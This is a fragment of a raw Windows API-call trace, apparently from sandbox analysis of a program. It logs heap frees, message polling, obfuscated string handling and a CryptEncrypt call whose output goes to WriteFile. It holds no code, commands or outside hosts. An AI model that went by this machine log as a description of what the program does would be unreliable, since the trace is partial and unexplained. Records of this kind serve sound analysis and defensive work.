hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0211.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9dd78 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0211.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0211.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab320, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.092] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x115b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1160) returned 1 [0211.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.093] CharLowerBuffW (in: lpsz="byte[4448]", cchLength=0xa | out: lpsz="byte[4448]") returned 0xa [0211.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.093] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.093] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.093] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.093] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.093] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.093] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab350, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.093] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9dd78*, pdwDataLen=0x8cef60*=0x115b, dwBufLen=0x1160 | out: pbData=0x2a9dd78*, pdwDataLen=0x8cef60*=0x1160) returned 1 [0211.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.094] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.094] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.094] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.094] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.094] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.094] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.095] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.098] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.098] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.098] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.098] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.098] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.098] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.098] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.098] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.099] WriteFile (in: hFile=0x4dc, lpBuffer=0x2aa3480*, nNumberOfBytesToWrite=0x1160, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aa3480*, lpNumberOfBytesWritten=0x8cf5e4*=0x1160, lpOverlapped=0x0) returned 1 [0211.100] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.100] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.100] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0211.100] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.100] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0211.100] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.100] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.100] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.100] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.100] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.100] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.100] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.100] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaae88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.100] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0211.100] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.100] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.100] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.100] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.100] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.101] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.101] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.101] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.101] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.101] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.101] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.101] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.101] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.101] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.101] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.101] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.101] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.101] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.101] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.102] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.102] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.102] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.102] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.102] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.102] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.102] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.102] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.102] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.102] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.102] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.102] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.102] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.102] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.102] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.102] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.102] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.102] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.102] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.102] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.102] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.102] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.103] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.103] CryptReleaseContext (hProv=0xa7c2a8, dwFlags=0x0) returned 1 [0211.103] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.103] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.103] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.103] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.103] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.103] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.103] FreeLibrary (hLibModule=0x76390000) returned 1 [0211.103] PeekMessageW (in: lpMsg=0x8cf4a8, 